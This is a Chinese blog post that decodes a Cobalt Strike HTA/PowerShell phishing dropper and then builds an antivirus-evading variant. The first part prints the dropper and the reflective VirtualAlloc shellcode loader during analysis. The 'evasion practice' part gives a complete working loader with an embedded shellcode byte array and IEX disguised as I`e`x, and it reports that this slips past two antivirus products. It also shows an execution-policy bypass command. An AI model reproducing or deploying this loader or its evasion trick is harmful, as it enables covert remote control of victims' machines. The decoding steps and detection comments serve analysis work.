CS hta上線=>Powershell混淆解密=>簡單混淆免殺實踐


前言

演練項目,抓到一個Cs的hta形式的powershell木馬,通過hta釣魚上線,Payload是Powershell

解密

其實根據態勢感知流量分析已經獲得了公網IP,出於興趣解密一下
腳本如下:

<script language="VBScript">
	' HTA dropper: when mshta.exe renders this file the VBScript runs with the logged-on
	' user's rights and starts a hidden PowerShell whose entire payload sits on the command line.
	Function var_func()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		' -nop (no profile), -w hidden (no window), -encodedcommand (Base64 of the UTF-16LE script);
		' Run's trailing 0 hides the window and "true" blocks until PowerShell exits.
		' Detection point: the process chain mshta.exe -> powershell.exe with -encodedcommand is
		' almost never legitimate and is a high-fidelity rule on its own.
		var_shell.run "powershell -nop -w hidden -encodedcommand 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", 0, true
	End Function

	var_func
	' Close the HTA window right away so nothing stays visible to the user.
	self.close
</script>

base64解碼后得到:

# First stage, as recovered from the -encodedcommand argument: Base64 -> in-memory Gzip decompress
# -> Invoke-Expression. Nothing is written to disk, so file scanning never sees the second stage;
# the places that do are the command line (-nop -w hidden -encodedcommand under mshta.exe),
# script-block logging (Event ID 4104 records the decompressed text) and AMSI.
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

發現將base64解碼后存入內存流中,然后用Gzip解壓縮,再通過Invoke-Expression將解壓得到的字符串作為命令執行
可以使用如下腳本解密

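# Decode a "Base64 -> Gzip -> IEX" stager WITHOUT executing it.
# Replace 'gzip base64' with the string taken from the FromBase64String(...) argument of the
# first stage; the decompressed text is copied to the clipboard for reading.
# The original's Invoke-Expression is deliberately absent, so nothing here runs the payload.
$data = [System.Convert]::FromBase64String('gzip base64')
# Wrapping the byte array directly gives a readable stream positioned at 0, so the
# Write/Seek dance is not needed.
$ms = New-Object System.IO.MemoryStream(,$data)
$gz = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($gz)
try {
    $sr.ReadToEnd() | Set-Clipboard
}
finally {
    # Disposing the reader also closes the GZip and memory streams underneath it,
    # even when decoding throws (e.g. truncated Base64 or a non-gzip blob).
    $sr.Dispose()
}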

或者將base64_decode后的powershell代碼修改為

# Same decompression chain as the stager, with the trailing IEX replaced by Out-File:
# the second stage is written to decode.txt for reading instead of being evaluated.
(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()|Out-File decode.txt

把上述代碼保存為ps1腳本然后執行,Powershell提示禁止執行該腳本,這里涉及到了執行策略(Execution Policy)的問題
可以如下代碼解決
powershell -exec bypass -file .\encode.ps1
解密得到

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	# Resolve an exported native function address without Add-Type or a P/Invoke declaration:
	# the non-public Microsoft.Win32.UnsafeNativeMethods class inside System.dll already wraps
	# GetModuleHandle and GetProcAddress, so reflecting on it yields a pointer while leaving no
	# compiled helper assembly behind. This is the stock Cobalt Strike PowerShell stager idiom.
	Param ($var_module, $var_procedure)		
	# Locate the GAC copy of System.dll among the loaded assemblies and pull the internal type from it.
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	# The GetProcAddress(HandleRef, string) overload, invoked below as a static method.
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	# GetModuleHandle($var_module) -> module handle, wrapped in a HandleRef, then GetProcAddress(handle, $var_procedure).
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	# Build a delegate type at run time (System.Reflection.Emit) for the given parameter and
	# return types, so an arbitrary native function pointer can be called through
	# Marshal::GetDelegateForFunctionPointer without any pre-declared delegate.
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	# In-memory dynamic assembly 'ReflectedDelegate' / module 'InMemoryModule' containing one sealed
	# class derived from MulticastDelegate; nothing touches disk. These fixed names appear in CLR
	# assembly-load telemetry and can serve as a hunting indicator for this loader family.
	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	# Constructor and Invoke are flagged 'Runtime, Managed' so the CLR supplies the delegate bodies.
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

# Second stage: the Base64 blob is the beacon shellcode, masked with a single-byte XOR key.
[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

# Unmask in place: every byte XOR 35 (0x23). The key is a constant in the script, so an analyst
# recovers the plain shellcode by applying the same XOR once; nothing here is actually encrypted.
for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

# kernel32!VirtualAlloc(IntPtr lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect),
# reached through the reflective helpers above instead of Add-Type.
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: a fresh RWX region sized to the
# shellcode. Unbacked private RWX memory inside powershell.exe is the classic memory-scanner indicator here.
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
# Copy the unmasked shellcode into that region.
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

# Treat the start of the buffer as a void(IntPtr) function and call it on the current thread:
# no CreateThread is involved, so this powershell.exe process itself effectively becomes the beacon.
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

# On a 64-bit host the loader string is handed to a 32-bit PowerShell job (-RunAs32), presumably
# because the embedded shellcode is 32-bit (VirtualAlloc is also declared with UInt32 sizes);
# otherwise it is evaluated in place. Either way the payload exists only as a string fed to
# Invoke-Expression, which is exactly what script-block logging (4104) and AMSI observe, and the
# 64-bit branch additionally spawns a child 32-bit powershell.exe worth alerting on.
If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

powershell的上線方式也是通過VirtualAlloc分配內存然后執行Cs的shellcode,shellcode存放在了$var_code變量中

免殺實踐

這里根據一些師傅的免殺文章中的一些方法來簡單實踐一下

提取shellcode,修改關鍵字

首先Cs生成一個Powershell木馬

然后我們可以直接將$var_code里的shellcode提取出來,提取出來是十進制字節數組形式,然后嘗試修改下IEX命令,通過添加`反引號(反引號在PowerShell中是轉義字符,在這里不影響命令執行)
提取shellcode並且通過Foreach格式化一下

# Dump the shellcode as a comma-separated list of decimal byte values (the form used in the
# listing below). Note this is still the XOR-masked form: the loader's "-bxor 35" step is not
# applied here, so the file is not directly usable for disassembly or signature work until unmasked.
$code=""
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('base64_shellcode代碼')
$s|foreach{$code=$code+$_.ToString()+','}
$code|Out-File shellcode_Decode.txt

然后將Ascii碼樣式直接放入shellcode變量中
再修改IEX為i`e`x

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	# Unchanged from the decoded sample: reflective lookup of a native export via the non-public
	# Microsoft.Win32.UnsafeNativeMethods wrappers in System.dll (GetModuleHandle + GetProcAddress),
	# avoiding Add-Type so no helper assembly is compiled to disk.
	Param ($var_module, $var_procedure)		
	# Pick the GAC System.dll out of the loaded assemblies and fetch the internal type.
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	# GetProcAddress(HandleRef, string) overload.
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	# GetModuleHandle($var_module) wrapped in a HandleRef, then GetProcAddress(handle, $var_procedure).
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	# Unchanged from the decoded sample: emit a delegate type at run time for the given
	# signature so a raw function pointer can be invoked via GetDelegateForFunctionPointer.
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	# The literal names 'ReflectedDelegate', 'InMemoryModule' and 'MyDelegateType' survive this
	# "evasion" untouched and remain visible in CLR assembly-load telemetry.
	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	# 'Runtime, Managed' lets the CLR provide the constructor and Invoke implementations.
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code =(223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,154,1,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,89,71,100,20,35,49,46,125,92,54,198,245,90,211,67,88,10,191,110,37,106,173,192,149,168,197,191,34,218,90,121,63,241,237,244,44,173,50,112,4,107,127,117,204,116,68,111,32,53,182,99,27,146,17,71,194,98,74,211,255,172,128,163,150,23,117,158,182,13,91,14,157,184,166,165,236,246,116,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,23,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,27,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,10,46,41,35,0,140,45,72,90,98,218,209,144,163,168,151,88,95,24,75,49,102,96,245,126,79,69,230,33,227,58,166,209,119,179,172,89,143,194,217,82,198,14,235,121,156,154,67,111,88,46,158,207,146,199,101,135,90,28,153,239,62,255,53,47,214,143,132,209,63,186,55,12,107,142,11,195,69,100,67,98,6,130,164,244,33,79,31,83,232,7,251,153,61,109,253,227,132,178,136,89,149,47,1
83,67,8,172,211,210,184,168,133,223,114,200,234,123,85,61,37,75,50,169,192,131,146,116,225,71,2,14,23,192,185,221,118,136,189,20,11,37,110,43,63,66,18,144,39,155,233,41,212,199,193,197,60,177,156,58,93,56,109,49,190,194,26,13,80,169,229,35,158,39,55,208,72,124,221,206,193,40,50,223,229,141,41,154,113,174,204,143,137,49,66,221,14,188,208,157,181,165,90,117,131,43,0,101,55,155,121,38,140,254,70,34,34,228,111,225,244,64,182,94,145,119,239,38,49,139,152,249,202,55,39,222,50,170,171,209,44,66,181,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,26,17,13,18,21,27,13,17,17,21,13,18,16,18,35,49,23,117,91)

# Same unmasking as the original: XOR every byte with 35 (0x23). Swapping the Base64 string for a
# decimal array changes only how the bytes are stored in the file, not the bytes themselves.
for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

# VirtualAlloc resolved reflectively; 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
# The behavioural footprint (RWX private allocation in powershell.exe, then a call into it) is
# identical to the unmodified stager, which is why this variant defeats static string matching only.
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

# Call the buffer as void(IntPtr) on the current thread.
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

# The only edit relative to the decoded sample is IEX written as I`e`x. Inside a bare word the
# backtick is PowerShell's escape character and is dropped by the parser, so the command is
# unchanged and only the on-disk text stops matching a literal "IEX" signature. Script-block
# logging should still record the original text, and AMSI still receives what is handed to
# Invoke-Expression, so detections keyed on the decoded second stage are not expected to be affected.
If ([IntPtr]::size -eq 8) {
	start-job { param($a) I`e`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	I`e`x $DoIt
}

放入靶機靜態查殺可以過360和火絨

動態也可以過,沒有任何反應
但是virustotal顯示14的查殺率,包括有360,但是虛擬機里並沒有報毒,可能360衛士在虛擬機和物理機環境下的查殺表現確實不一樣

http beacon流量

這里正好看一下Cs的http beacon流量
受控機默認每60s輪詢一次,服務端下達命令后,會等待受控端下一次連接再下發
默認的C2配置下,受控端用GET請求詢問是否有新的命令,Cookie中攜帶加密的請求信息;當服務端對GET請求返回200 OK且響應中帶有加密數據時,那就是服務端下達的命令

然后客戶端木馬程序拿到需要執行的命令並執行后,再通過POST請求將命令的執行結果放在data數據中發送給服務端

免殺文章:
信安之路-記一次PowerShell免殺實戰
powershell免殺
Cobalt Strike——利用混淆處理繞過Windows Defender
問題解決:
Win7 process explorer運行提示winsta.dll缺少重要函數
解決=>安裝Windows6.1-KB2533623-x64.msu

